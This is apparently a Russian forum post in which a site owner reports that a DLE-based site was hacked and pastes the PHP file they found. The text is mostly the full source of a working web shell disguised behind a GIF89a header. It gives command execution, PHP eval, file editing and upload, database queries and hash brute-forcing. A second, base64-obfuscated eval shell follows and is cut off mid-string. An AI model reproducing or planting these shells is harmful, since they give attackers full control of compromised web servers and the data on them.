какнули саит

20 февраля 2011

xакнули саит - www.cheats.lv DLE 9.0

я вопше в пхп нема етц.. но походу шеллом


GIF89aP;

<?GIF89aP;

error_reporting(0); //If there is an error, we'll show it, k?

$password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars.

$me = basename(__FILE__);

$cookiename = "wieeeee";


if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?

{

 if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.

 {

  $_POST['pass'] = md5($_POST['pass']);

 }

 if($_POST['pass'] == $password)

 {

   setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in

 }

 reload();

}


if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))

{

 login();

 die();

}

//

//Do not cross this line! All code placed after this block can't be executed without being logged in!

//

if(isset($_GET['p']) && $_GET['p'] == "logout")

{

setcookie ($cookiename, "", time() - 3600);

reload();

}

if(isset($_GET['dir']))

{

 chdir($_GET['dir']);

}


$pages = array(

 'cmd' => 'Execute Command',

 'eval' => 'Evaluate PHP',

 'mysql' => 'MySQL Query',

 'chmod' => 'Chmod File',

 'phpinfo' => 'PHPinfo',

 'md5' => 'md5 cracker',

 'headers' => 'Show headers',

 'logout' => 'Log out'

);

//The header, like it?

$header = '<html>

<title>'.getenv("HTTP_HOST").' ~ Shell I</title>

<head>

<style>

td {

 font-size: 12px;

 font-family: verdana;

 color: #33FF00;

 background: #000000;

}

#d {

 background: #003000;

}

#f {

 background: #003300;

}

#s {

 background: #006300;

}

#d:hover

{

 background: #003300;

}

#f:hover

{

 background: #003000;

}

pre {

 font-size: 10px;

 font-family: verdana;

 color: #33FF00;

}

a:hover {

text-decoration: none;

}


input,textarea,select {

 border-top-width: 1px;

 font-weight: bold;

 border-left-width: 1px;

 font-size: 10px;

 border-left-color: #33FF00;

 background: #000000;

 border-bottom-width: 1px;

 border-bottom-color: #33FF00;

 color: #33FF00;

 border-top-color: #33FF00;

 font-family: verdana;

 border-right-width: 1px;

 border-right-color: #33FF00;

}

hr {

color: #33FF00;

background-color: #33FF00;

height: 5px;

}

</style>

</head>

<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">

<table width=100%><td id="header" width=100%>

<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>]  [<a href="'.$me.'">Home</a>] ';

foreach($pages as $page => $page_name)

{

 $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';

}

$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';

print $header;

$footer = '<tr><td><hr><center>© <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';


//

//Page handling

//

if(isset($_REQUEST['p']))

{

  switch ($_REQUEST['p']) {


   case 'cmd': //Run command


    print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";

     if(isset($_REQUEST['command']))

     {

      print "<pre>";

      execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?

     }

   break;



   case 'edit': //Edit a fie

    if(isset($_POST['editform']))

    {

     $f = $_GET['file'];

     $fh = fopen($f, 'w') or print "Error while opening file!";

     fwrite($fh, $_POST['editform']) or print "Couldn't save file!";

     fclose($fh);

    }

    print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";


    if(file_exists($_GET['file']))

    {

     $rd = file($_GET['file']);

     foreach($rd as $l)

     {

      print htmlspecialchars($l);

     }

    }


    print "</textarea><input type=submit value=\"Save\"></form>";


   break;


   case 'delete': //Delete a file


    if(isset($_POST['yes']))

    {

     if(unlink($_GET['file']))

     {

      print "File deleted successfully.";

     }

     else

     {

      print "Couldn't delete file.";

     }

    }



    if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))

    {

     print "Are you sure you want to delete ".$_GET['file']."?<br>

     <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>

     <input type=hidden name=yes value=yes>

     <input type=submit value=\"Delete\">

     ";

    }



   break;



   case 'eval': //Evaluate PHP code


    print "<form action=\"".$me."?p=eval\" method=POST>

    <textarea cols=60 rows=10 name=\"eval\">";

    if(isset($_POST['eval']))

    {

     print htmlspecialchars($_POST['eval']);

    }

    else

    {

     print "print \"Yo Momma\";";

    }

    print "</textarea><br>

    <input type=submit value=\"Eval\">

    </form>";


    if(isset($_POST['eval']))

    {

     print "<h1>Output:</h1>";

     print "<br>";

     eval($_POST['eval']);

    }


   break;


   case 'chmod': //Chmod file



    print "<h1>Under construction!</h1>";

    if(isset($_POST['chmod']))

    {

    switch ($_POST['chvalue']){

     case 777:

     chmod($_POST['chmod'],0777);

     break;

     case 644:

     chmod($_POST['chmod'],0644);

     break;

     case 755:

     chmod($_POST['chmod'],0755);

     break;

    }

    print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";

    }

    if(isset($_GET['file']))

    {

     $content = urldecode($_GET['file']);

    }

    else

    {

     $content = "file/path/please";

    }


    print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:

    <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>

    <select name=\"chvalue\">

<option value=\"777\">777</option>

<option value=\"644\">644</option>

<option value=\"755\">755</option>

</select><input type=submit value=\"Change\">";


   break;


   case 'mysql': //MySQL Query


   if(isset($_POST['host']))

   {

    $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());

    mysql_select_db($_POST['dbase']);

    $sql = $_POST['query'];



    $result = mysql_query($sql);


   }

   else

   {

    print "

    This only queries the database, doesn't return data!<br>

    <form action=\"".$me."?p=mysql\" method=POST>

    <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>

    <b>Username:<br><input type=text name=username value=\"root\" size=10><br>

    <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>

    <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>


    <b>Query:<br></b<textarea name=query></textarea>

    <input type=submit value=\"Query database\">

    </form>

    ";


   }


   break;


   case 'createdir':

   if(mkdir($_GET['crdir']))

   {

   print 'Directory created successfully.';

   }

   else

   {

   print 'Couldn\'t create directory';

   }

   break;



   case 'phpinfo': //PHP Info

    phpinfo();

   break;



   case 'rename':


    if(isset($_POST['fileold']))

    {

     if(rename($_POST['fileold'],$_POST['filenew']))

     {

      print "File renamed.";

     }

     else

     {

      print "Couldn't rename file.";

     }


    }

    if(isset($_GET['file']))

    {

     $file = basename(htmlspecialchars($_GET['file']));

    }

    else

    {

     $file = "";

    }


    print "Renaming ".$file." in folder ".realpath('.').".<br>

        <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>

     <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>

     <b>To:<br><input type=text name=filenew value=\"\" size=10><br>

     <input type=submit value=\"Rename file\">

     </form>";

   break;


   case 'md5':

   if(isset($_POST['md5']))

   {

   if(!is_numeric($_POST['timelimit']))

   {

   $_POST['timelimit'] = 30;

   }

   set_time_limit($_POST['timelimit']);

    if(strlen($_POST['md5']) == 32)

    {


      if($_POST['chars'] == "9999")

      {

      $i = 0;

      while($_POST['md5'] != md5($i) && $i != 100000)

       {

        $i++;

       }

      }

      else

      {

       for($i = "a"; $i != "zzzzz"; $i++)

       {

        if(md5($i == $_POST['md5']))

        {

         break;

        }

       }

      }


     if(md5($i) == $_POST['md5'])

     {

       print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";

     }


    }


   }


   print "Will bruteforce the md5

    <form action=\"".$me."?p=md5\" method=POST>

    <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>

    <b>Characters:</b><br><select name=\"chars\">

    <option value=\"az\">a - zzzzz</option>

    <option value=\"9999\">1 - 9999999</option>

    </select>

    <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>

    <input type=submit value=\"Bruteforce md5\">

    </form><br>*: if set_time_limit is allowed by php.ini";

   break;


   case 'headers':

   foreach(getallheaders() as $header => $value)

   {

   print htmlspecialchars($header . ":" . $value)."<br>";


   }

   break;

  }

}

else //Default page that will be shown when the page isn't found or no page is selected.

{


 $files = array();

 $directories = array();


 if(isset($_FILES['uploadedfile']['name']))

{

 $target_path = realpath('.').'/';

 $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);

 if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {

     print "File:".  basename( $_FILES['uploadedfile']['name']).

     " has been uploaded";

 } else{

     echo "File upload failed!";

 }

}





 print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";

 if ($handle = opendir('.'))

 {

  while (false !== ($file = readdir($handle)))

  {

        if(is_dir($file))

     {

    $directories[] = $file;

     }

     else

     {

    $files[] = $file;

     }

  }

 asort($directories);

 asort($files);

  foreach($directories as $file)

  {

   print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";

  }


  foreach($files as $file)

  {

   print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";

  }

 }

 else

 {

  print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";

 }


 print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">

<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />

<input type=\"submit\" value=\"Upload File\" />

</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>

<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>

</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>

</table>";


}


function login()

{

 print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>

 <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>

 <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">

 </form>";

}

function reload()

{

 header("Location: ".basename(__FILE__));

}

function get_execution_method()

{

 if(function_exists('passthru')){ $m = "passthru"; }

 if(function_exists('exec')){ $m = "exec"; }

 if(function_exists('shell_exec')){ $m = "shell_ exec"; }

 if(function_exists('system')){ $m = "system"; }

 if(!isset($m)) //No method found :-|

 {

  $m = "Disabled";

 }

 return($m);

}

function execute_command($method,$command)

{

 if($method == "passthru")

 {

  passthru($command);

 }


 elseif($method == "exec")

 {

  exec($command,$result);

  foreach($result as $output)

  {

   print $output."<br>";

  }

 }


 elseif($method == "shell_exec")

 {

  print shell_exec($command);

 }


 elseif($method == "system")

 {

  system($command);

 }

}

function perm($file)

{

 if(file_exists($file))

 {

  return substr(sprintf('%o', fileperms($file)), -4);

 }

 else

 {

  return "????";

 }

}

function get_color($file)

{

if(is_writable($file)) { return "green";}

if(!is_writable($file) && is_readable($file)) { return "white";}

if(!is_writable($file) && !is_readable($file)) { return "red";}


}

function show_dirs($where)

{

 if(ereg("^c:",realpath($where)))

 {

 $dirparts = explode('\\',realpath($where));

 }

 else

 {

 $dirparts = explode('/',realpath($where));

 }




 $i = 0;

 $total = "";


 foreach($dirparts as $part)

 {

  $p = 0;

  $pre = "";

  while($p != $i)

  {

   $pre .= $dirparts[$p]."/";

   $p++;


  }

  $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";

  $i++;

 }


 return "<h2>".$total."</h2><br>";

}

print $footer;

// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)

exit();

?>

нашол такой php фаил! че делать? :angry:

спосибо!


<? eval(base64_decode('JHNoX2lkID0gIlcwTjVZbVZ5SUVGdVlYSmphSGtnVTJobGJHeGQiOw0KJHNoX25hbWUgPSBiYXNl'.

'NjRfZGVjb2RlKCRzaF9pZCk7DQokc2hfbWFpbnVybCA9ICJodHRwOi8vQ3liZXJBbmFyY2h5Lm9y'.

'ZyI7DQokaHRtbF9zdGFydCA9ICc8aHRtbD48aGVhZD4NCjx0aXRsZT4nLmdldGVudigiSFRUUF9I'.

'T1NUIikuJyAtICcuJHNoX25hbWUuJzwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0K'.

'PCEtLQ0KYm9keSx0YWJsZSB7IGZvbnQtZmFtaWx5OnZlcmRhbmE7Zm9udC1zaXplOjExcHg7Y29s'.

'b3I6cmVkO2JhY2tncm91bmQtY29sb3I6YmxhY2s7IH0NCnRhYmxlIHsgd2lkdGg6MTAwJTsgfQ0K'.

'dGFibGUsdGQgeyBib3JkZXI6MXB4IHNvbGlkIGJsYWNrO21hcmdpbi10b3A6MjttYXJnaW4tYm90'.

'dG9tOjI7cGFkZGluZzo1cHg7IH0NCmEgeyBjb2xvcjpsaWdodGJsdWU7dGV4dC1kZWNvcmF0aW9u'.

'Om5vbmU7IH0NCmE6YWN0aXZlIHsgY29sb3I6IzAwRkYwMDsgfQ0KYTpsaW5rIHsgY29sb3I6IzVC'.

'NUJGRjsgfQ0KYTpob3ZlciB7IHRleHQtZGVjb3JhdGlvbjp1bmRlcmxpbmU7IH0NCmE6dmlzaXRl'.

'ZCB7IGNvbG9yOiM5OUNDRkY7IH0NCmlucHV0LHNlbGVjdCxvcHRpb24geyBmb250OjhwdCB0YWhv'.

'bWE7Y29sb3I6cmVkO21hcmdpbjoyO2JvcmRlcjoxcHggc29saWQgbGltZTsgfQ0KdGV4dGFyZWEg'.

'eyBjb2xvcjpsaW1lO2ZvbnQ6dmVyZGFuYSBib2xkO2JvcmRlcjoxcHggc29saWQgbGltZTttYXJn'.

'aW46MjsgfQ0KLmZsZWZ0IHsgZmxvYXQ6bGVmdDt0ZXh0LWFsaWduOmxlZnQ7IH0NCi5mcmlnaHQg'.

'eyBmbG9hdDpyaWdodDt0ZXh0LWFsaWduOnJpZ2h0OyB9DQojcGFnZWJhciB7IGZvbnQ6OHB0IHRh'.

'aG9tYTtwYWRkaW5nOjVweDsgYm9yZGVyOjNweCBzb2xpZCBibGFjazsgYm9yZGVyLWNvbGxhcHNl'.

'OmNvbGxhcHNlOyB9DQojcGFnZWJhciB0ZCB7IHZlcnRpY2FsLWFsaWduOnRvcDsgfQ0KI3BhZ2Vi'.

'YXIgcCB7IGZvbnQ6OHB0IHRhaG9tYTt9DQojcGFnZWJhciBhIHsgZm9udC13ZWlnaHQ6Ym9sZDtj'.

'b2xvcjojMDBGRjAwOyB9DQojcGFnZWJhciBhOnZpc2l0ZWQgeyBjb2xvcjojMDBDRTAwOyB9DQoj'.

'bWFpbm1lbnUgeyB0ZXh0LWFsaWduOmNlbnRlcjsgfQ0KI21haW5tZW51IGEgeyB0ZXh0LWFsaWdu'.

'OiBjZW50ZXI7cGFkZGluZzogMHB4IDVweCAwcHggNXB4OyB9DQojbWFpbmluZm8sLmJhcmhlYWRl'.

'ciwuYmFyaGVhZGVyMiB7IHRleHQtYWxpZ246Y2VudGVyOyB9DQojbWFpbmluZm8gdGQgeyBwYWRk'.

'aW5nOjNweDsgfQ0KLmJhcmhlYWRlciB7IGZvbnQtd2VpZ2h0OmJvbGQ7cGFkZGluZzo1cHg7IH0N'.

'Ci5iYXJoZWFkZXIyIHsgcGFkZGluZzo1cHg7Ym9yZGVyOjJweCBzb2xpZCBibGFjazsgfQ0KLmNv'.

'bnRlbnRzLC5leHBsb3JlciB7IGJvcmRlci1jb2xsYXBzZTpjb2xsYXBzZTt9DQouY29udGVudHMg'.

'dGQgeyB2ZXJ0aWNhbC1hbGlnbjp0b3A7IH0NCi5tYWlucGFuZWwgeyBib3JkZXItY29sbGFwc2U6'.

'Y29sbGFwc2U7cGFkZGluZzo1cHg7IH0NCi5iYXJoZWFkZXIsLm1haW5wYW5lbCB0YWJsZSx0ZCB7'.

'IGJvcmRlcjoxcHggc29saWQgZ3JlZW47IH0NCi5tYWlucGFuZWwgaW5wdXQsc2VsZWN0LG9wdGlv'.

'biB7IGJvcmRlcjoxcHggc29saWQgYmxhY2s7bWFyZ2luOjA7IH0NCmlucHV0W3R5cGU9InN1Ym1p'.

'dCJdIHsgYm9yZGVyOjFweCBzb2xpZCBsaW1lOyB9DQppbnB1dFt0eXBlPSJ0ZXh0Il0geyBwYWRk'.

'aW5nOjNweDt9DQouc2hlbGwgeyBiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrO2NvbG9yOmJsYWNrO3Bh'.

'ZGRpbmc6NXB4OyB9DQouZnhlcnJtc2cgeyBjb2xvcjpyZWQ7IGZvbnQtd2VpZ2h0OmJvbGQ7IH0N'.

'CiNwYWdlYmFyLCNwYWdlYmFyIHAsaDEsaDIsaDMsaDQsZm9ybSB7IG1hcmdpbjowOyB9DQojcGFn'.

'ZWJhciwubWFpbnBhbmVsLGlucHV0W3R5cGU9InN1Ym1pdCJdIHsgYmFja2dyb3VuZC1jb2xvcjpi'.

'bGFjazsgfQ0KLmJhcmhlYWRlcjIsaW5wdXQsc2VsZWN0LG9wdGlvbixpbnB1dFt0eXBlPSJzdWJt'.

'aXQiXTpob3ZlciB7IGJhY2tncm91bmQtY29sb3I6YmxhY2s7IH0NCnRleHRhcmVhLC5tYWlucGFu'.

'ZWwgaW5wdXQsc2VsZWN0LG9wdGlvbiB7IGJhY2tncm91bmQtY29sb3I6IzAwMDAwMDsgfQ0KLy8g'.

'LS0+DQo8L3N0eWxlPg0KPC9oZWFkPg0KPGJvZHk+DQonOw0KJGxvZ2luID0gIiI7IA0KJHBhc3Mg'.

'PSAiIjsNCiRtZDVfcGFzcyA9ICIiOw0KJGhvc3RfYWxsb3cgPSBhcnJheSgiKiIpOyANCiRsb2dp'.

'bl90eHQgPSAiUmVzdHJpY3RlZCBBcmVhIjsgDQokYWNjZXNzZGVuaWVkbWVzcyA9ICI8Ym9keSBi'.

'Z2NvbG9yPWJsYWNrPjxhIGhyZWY9XCIkc2hfbWFpbnVybFwiPjxmb250IGNvbG9yPWxpbWU+Ii4k'.

'c2hfbmFtZS4iPC9mb250PjwvYT46IDxmb250IGNvbG9yPXJlZD5hY2Nlc3MgZGVuaWVkPC9mb250'.

'PjwvYm9keT4iOw0KJGd6aXBlbmNvZGUgPSBUUlVFOw0KJGZpbGVzdGVhbHRoID0gVFJVRTsgDQok'.

'Y3VyZGlyID0gIi4vIjsNCiR0bXBkaXIgPSAiIjsgDQokdG1wZGlyX2xvZyA9ICIuLyI7DQokbG9n'.

'X2VtYWlsID0gInNwaWRlci5yMG90QGdtYWlsLmNvbSI7IA0KJHNvcnRfZGVmYXVsdCA9ICIwYSI7'.

'IA0KJHNvcnRfc2F2ZSA9IFRSVUU7IA0KJHNlc3NfY29va2llID0gImNhcHJpdjh2YXJzIjsgDQok'.

'dXNlZnNidWZmID0gVFJVRTsgDQokY29weV91bnNldCA9IEZBTFNFOyANCiRoZXhkdW1wX2xpbmVz'.

'ID0gODsNCiRoZXhkdW1wX3Jvd3MgPSAyNDsNCiR3aW4gPSBzdHJ0b2xvd2VyKHN1YnN0cihQSFBf'.

'T1MsMCwzKSkgPT0gIndpbiI7DQokZGlzYWJsZWZ1bmMgPSBAaW5pX2dldCgiZGlzYWJsZV9mdW5j'.

'dGlvbnMiKTsNCmlmICghZW1wdHkoJGRpc2FibGVmdW5jKSkgew0KICAkZGlzYWJsZWZ1bmMgPSBz'.

'dHJfcmVwbGFjZSgiICIsIiIsJGRpc2FibGVmdW5jKTsNCiAgJGRpc2FibGVmdW5jID0gZXhwbG9k'.

'ZSgiLCIsJGRpc2FibGVmdW5jKTsNCn0NCmZ1bmN0aW9uIGdldF9waHBpbmkoKSB7DQogIGZ1bmN0'.

'aW9uIFVfd29yZHdyYXAoJHN0cikgew0KICAgICRzdHIgPSBAd29yZHdyYXAoQGh0bWxzcGVjaWFs'.

'Y2hhcnMoJHN0ciksIDEwMCwgJzx3YnIgLz4nLCB0cnVlKTsNCiAgICByZXR1cm4gQHByZWdfcmVw'.

'bGFjZSgnISgmW147XSopPHdiciAvPihbXjtdKjspIScsICckMSQyPHdiciAvPicsICRzdHIpOw0K'.

'ICB9DQogIGZ1bmN0aW9uIFVfdmFsdWUoJHZhbHVlKSB7DQogICAgaWYgKCR2YWx1ZSA9PSAnJykg'.

'cmV0dXJuICc8aT5ubyB2YWx1ZTwvaT4nOw0KICAgIGlmIChAaXNfYm9vbCgkdmFsdWUpKSByZXR1'.

'cm4gJHZhbHVlID8gJ1RSVUUnIDogJ0ZBTFNFJzsNCiAgICBpZiAoJHZhbHVlID09PSBudWxsKSBy'.

'ZXR1cm4gJ05VTEwnOw0KICAgIGlmIChAaXNfb2JqZWN0KCR2YWx1ZSkpICR2YWx1ZSA9IChhcnJh'.

'eSkgJHZhbHVlOw0KICAgIGlmIChAaXNfYXJyYXkoJHZhbHVlKSkgew0KICAgICAgQG9iX3N0YXJ0'.

'KCk7DQogICAgICBwcmludF9yKCR2YWx1ZSk7DQogICAgICAkdmFsdWUgPSBAb2JfZ2V0X2NvbnRl'.

'bnRzKCk7DQogICAgICBAb2JfZW5kX2NsZWFuKCk7DQogICAgfQ0KICAgIHJldHVybiBVX3dvcmR3'.

'cmFwKChzdHJpbmcpICR2YWx1ZSk7DQogIH0NCiAgaWYgKEBmdW5jdGlvbl9leGlzdHMoJ2luaV9n'.

'ZXRfYWxsJykpIHsNCiAgICAkciA9ICIiOw0KICAgIGVjaG8gIjx0YWJsZT48dHIgY2xhc3M9YmFy'.

'aGVhZGVyPjx0ZD5EaXJlY3RpdmU8L3RkPjx0ZD5Mb2NhbCBWYWx1ZTwvdGQ+PHRkPkdsb2JhbCBW'.

'YWx1ZTwvdGQ+PC90cj4iOw0KICAgIGZvcmVhY2ggKEBpbmlfZ2V0X2FsbCgpIGFzICRrZXk9PiR2'.

'YWx1ZSkgew0KICAgICAgJHIgLj0gIjx0cj48dGQ+Ii4ka2V5LiI8L3RkPjx0ZD48ZGl2IGFsaWdu'.

'PWNlbnRlcj4iLlVfdmFsdWUoJHZhbHVlWydsb2NhbF92YWx1ZSddKS4iPC9kaXY+PC90ZD48dGQ+'.

'PGRpdiBhbGlnbj1jZW50ZXI+Ii5VX3ZhbHVlKCR2YWx1ZVsnZ2xvYmFsX3ZhbHVlJ10pLiI8L2Rp'.

'dj48L3RkPjwvdHI+IjsNCiAgICB9DQogICAgZWNobyAkcjsNCiAgICBlY2hvICI8L3RhYmxlPiI7'.

'DQogIH0NCn0NCmZ1bmN0aW9uIGRpc3BfZHJpdmVzKCRjdXJkaXIsJHN1cmwpIHsNCiAgJGxldHRl'.

'cnMgPSAiIjsNCiAgJHYgPSBleHBsb2RlKCJcXCIsJGN1cmRpcik7DQogICR2ID0gJHZbMF07DQog'.

'IGZvcmVhY2ggKHJhbmdlKCJBIiwiWiIpIGFzICRsZXR0ZXIpIHsNCiAgICAkYm9vbCA9ICRpc2Rp'.

'c2tldHRlID0gJGxldHRlciA9PSAiQSI7DQogICAgaWYgKCEkYm9vbCkgeyRib29sID0gaXNfZGly'.

'KCRsZXR0ZXIuIjpcXCIpO30NCiAgICBpZiAoJGJvb2wpIHsNCiAgICAgICRsZXR0ZXJzIC49ICI8'.

'YSBocmVmPVwiIi4kc3VybC4ieD1scyZkPSIudXJsZW5jb2RlKCRsZXR0ZXIuIjpcXCIpLiJcIiIu'.

'DQogICAgICAoJGlzZGlza2V0dGU/IiBvbmNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ01ha2Ugc3Vy'.

'ZSB0aGF0IHRoZSBkaXNrZXR0ZSBpcyBpbnNlcnRlZCBwcm9wZXJseSwgb3RoZXJ3aXNlIGFuIGVy'.

'cm9yIG1heSBvY2N1ci4nKVwiIjoiIikuIj4gWyI7DQogICAgICBpZiAoJGxldHRlci4iOiIgIT0g'.

'JHYpIHskbGV0dGVycyAuPSAkbGV0dGVyO30NCiAgICAgIGVsc2UgeyRsZXR0ZXJzIC49ICI8Zm9u'.

'dCBjb2xvcj15ZWxsb3c+Ii4kbGV0dGVyLiI8L2ZvbnQ+Ijt9DQogICAgICAkbGV0dGVycyAuPSAi'.

'XTwvYT4gIjsNCiAgICB9DQogIH0NCiAgaWYgKCFlbXB0eSgkbGV0dGVycykpIHtSZXR1cm4gJGxl'.

'dHRlcnM7fQ0KICBlbHNlIHtSZXR1cm4gIk5vbmUiO30NCn0NCmlmIChpc19jYWxsYWJsZSgiZGlz'.

'a19mcmVlX3NwYWNlIikpIHsNCiAgZnVuY3Rpb24gZGlzcF9mcmVlc3BhY2UoJGN1cmRydikgew0K'.

'ICAgICRmcmVlID0gZGlza19mcmVlX3NwYWNlKCRjdXJkcnYpOw0KICAgICR0b3RhbCA9IGRpc2tf'.

'dG90YWxfc3BhY2UoJGN1cmRydik7DQogICAgaWYgKCRmcmVlID09PSBGQUxTRSkgeyRmcmVlID0g'.

'MDt9DQogICAgaWYgKCR0b3RhbCA9PT0gRkFMU0UpIHskdG90YWwgPSAwO30NCiAgICBpZiAoJGZy'.

'ZWUgPCAwKSB7JGZyZWUgPSAwO30NCiAgICBpZiAoJHRvdGFsIDwgMCkgeyR0b3RhbCA9IDA7fQ0K'.

'ICAgICR1c2VkID0gJHRvdGFsLSRmcmVlOw0KICAgICRmcmVlX3BlcmNlbnQgPSByb3VuZCgxMDAv'.

'KCR0b3RhbC8kZnJlZSksMikuIiUiOw0KICAgICRmcmVlID0gdmlld19zaXplKCRmcmVlKTsNCiAg'.

'ICAkdG90YWwgPSB2aWV3X3NpemUoJHRvdGFsKTsNCiAgICByZXR1cm4gIiRmcmVlIG9mICR0b3Rh'.

'bCAoJGZyZWVfcGVyY2VudCkiOw0KICB9DQp9DQppZiAoIWZ1bmN0aW9uX2V4aXN0cygibXlzaGVs'.

'bGV4ZWMiKSkgew0KICBpZihpc19jYWxsYWJsZSgicG9wZW4iKSkgew0KICAgIGZ1bmN0aW9uIG15'.

'c2hlbGxleGVjKCRjbWQpIHsNCiAgICAgIGlmICghKCRwPXBvcGVuKCIoJGNtZCkyPiYxIiwiciIp'.

'KSkgeyByZXR1cm4gInBvcGVuIERpc2FibGVkISI7IH0NCiAgICAgIHdoaWxlICghZmVvZigkcCkp'.

'IHsNCiAgICAgICAgJGxpbmU9ZmdldHMoJHAsMTAyNCk7DQogICAgICAgICRvdXQgLj0gJGxpbmU7'.

'DQogICAgICB9DQogICAgICBwY2xvc2UoJHApOw0KICAgICAgcmV0dXJuICRvdXQ7DQogICAgfQ0K'.

'ICB9IGVsc2Ugew0KICAgIGZ1bmN0aW9uIG15c2hlbGxleGVjKCRjbWQpIHsNCiAgICAgIGdsb2Jh'.

'bCAkZGlzYWJsZWZ1bmM7DQogICAgICAkcmVzdWx0ID0gIiI7DQogICAgICBpZiAoIWVtcHR5KCRj'.

'bWQpKSB7DQogICAgICAgIGlmIChpc19jYWxsYWJsZSgiZXhlYyIpIGFuZCAhaW5fYXJyYXkoImV4'.

'ZWMiLCRkaXNhYmxlZnVuYykpIHsNCiAgICAgICAgICBleGVjKCRjbWQsJHJlc3VsdCk7DQogICAg'.

'ICAgICAgJHJlc3VsdCA9IGpvaW4oIlxuIiwkcmVzdWx0KTsNCiAgICAgICAgfSBlbHNlaWYgKCgk'.

'cmVzdWx0ID0gJGNtZCkgIT09IEZBTFNFKSB7DQogICAgICAgIH0gZWxzZWlmIChpc19jYWxsYWJs'.

'ZSgic3lzdGVtIikgYW5kICFpbl9hcnJheSgic3lzdGVtIiwkZGlzYWJsZWZ1bmMpKSB7DQogICAg'.

'ICAgICAgJHYgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7IEBvYl9jbGVhbigpOyBzeXN0ZW0oJGNtZCk7'.

'ICRyZXN1bHQgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7IEBvYl9jbGVhbigpOyBlY2hvICR2Ow0KICAg'.

'ICAgICB9IGVsc2VpZiAoaXNfY2FsbGFibGUoInBhc3N0aHJ1IikgYW5kICFpbl9hcnJheSgicGFz'.

'c3RocnUiLCRkaXNhYmxlZnVuYykpIHsNCiAgICAgICAgICAkdiA9IEBvYl9nZXRfY29udGVudHMo'.

